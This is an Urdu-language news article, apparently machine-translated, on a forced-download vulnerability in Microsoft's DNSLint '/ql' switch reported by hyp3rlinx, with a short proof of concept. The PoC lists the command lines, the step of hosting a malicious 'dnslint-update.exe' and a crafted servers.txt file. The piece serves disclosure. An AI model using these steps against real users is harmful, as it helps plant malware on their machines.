مائیکرو سافٹ کے DNSLint یوٹیلیٹی QL سوئچ سے ریموٹ فائلوں کو ڈاؤن لوڈ کرنے کی اجازت مل سکتی ہے - Appouts.com

مائیکرو سافٹ کے DNSLint یوٹیلیٹی QL سوئچ سے ریموٹ فائلوں کو ڈاؤن لوڈ ہونے دیا جاسکتا ہے

سیکیورٹی / مائیکرو سافٹ کے DNSLint یوٹیلیٹی QL سوئچ سے ریموٹ فائلوں کو ڈاؤن لوڈ ہونے دیا جاسکتا ہے 2 منٹ پڑھا

مائیکروسافٹ کارپوریشن

مائیکرو سافٹ DNSLint افادیت ڈومین نام سسٹم (DNS) نام تلاش کرنے والے آئی پی ایڈریس سے متعلق مسائل کی تشخیص کرنے میں کام کرتی ہے جو براؤزر کے ذریعے مختلف ویب سرورز تک الاٹ کیے جاتے ہیں۔ یہ بنیادی ونڈوز پیکیج کے حصے کے طور پر شامل نہیں ہے بلکہ مائیکرو سافٹ کی ویب سائٹ سے مفت میں ڈاؤن لوڈ کیا جاسکتا ہے۔ ایک ریموٹ رس خطرے کو 7.6 (اہم) درجہ دیا گیا CVSS 3.0 ڈاؤن لوڈ کے ذریعہ جبری ڈرائیو کی وجہ سے اس افادیت کو متاثر کرنے کے لئے اسکیل کو دریافت کیا گیا تھا۔

کمزوری اس حقیقت سے نکلتی ہے کہ DNSLint '/ QL' سوئچ کے مطابق DNS ٹیسٹ فائلوں کو پارس کرتے وقت ڈومین ناموں کا جائزہ نہیں لیتا ہے۔ اس معاملے میں جب آخری صارف عام طور پر متوقع ڈومین نام کی معلومات کے برخلاف اسکرپٹ یا بائنری کوڈ پر مشتمل ایسی فائل کو استعمال کرنے کا انتظام کرتا ہے تو ، اس نظام کو خطرہ میں لایا جاسکتا ہے جہاں زبردستی ڈاؤن لوڈ کرنا آسان ہوجاتا ہے۔ اس معاملے میں ، جب ایسا ہوتا ہے تو ، ایک ہیکر کسی خراب فائل کی جبری ڈاؤن لوڈ کے لئے دباؤ ڈال سکتا ہے جو ویب براؤزر کے ذریعے رسائی حاصل کرنے پر ریموٹ کمانڈز کو ڈاؤن لوڈ اور اس پر عمل درآمد کرسکتا ہے۔ ڈاؤن لوڈ مقامی نظام کی جگہ اور سیکیورٹی تک رسائی کو فوری طور پر بچائے گا اور ، یہ دیکھ کر کہ فائل ڈسک ڈرائیو کے کسی مشہور مقام سے آئی ہے ، اس لئے صارف کو عمل درآمد کو آگے لے جانے کی اجازت دینے کی طرف راغب کیا جاسکتا ہے۔ ایک بار غلط فائل کو استحقاق ملنے کے بعد ، یہ کسی بھی مطلوبہ کوڈ کو دور سے چلا سکتا ہے اور صارف کی سلامتی اور رازداری میں سمجھوتہ کرسکتا ہے۔

جان پیج آف hyp3rlinx اس خطرے کی تقلید کرنے والے تصور کا ایک ثبوت تحریر کیا ہے ، اس کی وضاحت کرتے ہوئے کہ جب کسی اسکرپٹ یا بائنری ریفرنس ٹیکسٹ فائل کو ڈومین نام کے برخلاف استعمال کیا جاتا ہے تو اس کے تحت کسی غیرضروری فائل کو ڈاؤن لوڈ کیا جاسکتا ہے۔

dnslint.exe / v / y / d 'مالور فائل' / s X.X.X.X / r 'myreport'

DNSLint افادیت کے تناظر میں ، مندرجہ ذیل بتاتے ہیں کہ نظام میں میلویئر کو متعارف کروانے کے لئے کس طرح خطرے کا استحصال کیا جاسکتا ہے۔

1) ریموٹ ویب سرور روٹ پر 'dnslint-update.exe'۔
2) 'سرورز۔ ٹیکسٹ'
DNSLint
This یہ ایک نمونہ DNSLint ان پٹ فائل ہے
+ یہ DNS سرور کہا جاتا ہے: dns1.cp.msft.net
[dns ~ سرور] X.X.X.X
، a ، r A ایک ریکارڈ
X.X.X.X ، ptr ، r P PTR ریکارڈ
test1 ، cname ، r C CNAME ریکارڈ
test2 ، mx ، r M MX ریکارڈ
3) dnslint.exe / ql servers.txt

مذکورہ کوڈ میں ترمیم نہیں کی گئی تھی جیسے حقوق اس مواد پر hyp3rlinx کی۔ اس خطرے کو ظاہر کرتے ہوئے ، ایسا نہیں لگتا کہ ابھی تک اس مسئلے کو حل کرنے کے لئے کوئی پیچ اپ ڈیٹ ہے۔ اس خطرے سے متعلق ایک سی وی ای کوڈ ابھی بھی تفویض کیا جاسکتا ہے اور اس معاملے پر مائیکرو سافٹ نے اپنے سرکاری سیکیورٹی کے بلیٹن میں اس کی شناخت اور اس پر لکھنا ہے۔